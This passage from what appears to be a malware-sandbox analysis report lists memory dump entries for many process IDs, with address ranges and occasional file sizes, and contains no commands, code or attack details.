                                                                                                                                                                                                                                                                                                                        • memory/3944-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/3952-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/3952-291-0x0000000000900000-0x0000000000A4A000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                                                                                        • memory/3952-292-0x0000000000400000-0x00000000008F4000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                                                                                                                                        • memory/4000-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4016-359-0x0000000000417E6A-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4148-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4148-233-0x0000000004A10000-0x0000000004A11000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4148-225-0x0000000000230000-0x0000000000231000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4148-255-0x0000000007130000-0x000000000716F000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          252KB

                                                                                                                                                                                                                                                                                                                        • memory/4156-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4184-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4232-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4288-337-0x0000000004A50000-0x0000000004A51000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4288-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4368-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4428-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4580-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4580-339-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4668-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4676-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4680-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4772-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4824-278-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4824-284-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4836-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4840-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4904-333-0x0000000004E90000-0x0000000004E91000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4904-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4920-285-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4960-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4960-335-0x0000000077BB0000-0x0000000077D3E000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                                                        • memory/4960-345-0x0000000005750000-0x0000000005751000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4992-347-0x0000000002612000-0x0000000002613000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4992-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4992-346-0x0000000002610000-0x0000000002611000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4992-348-0x0000000002614000-0x0000000002616000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/5028-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5028-334-0x0000000005140000-0x0000000005141000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5036-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5124-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5136-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5176-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5228-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5240-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5560-369-0x0000000000000000-mapping.dmp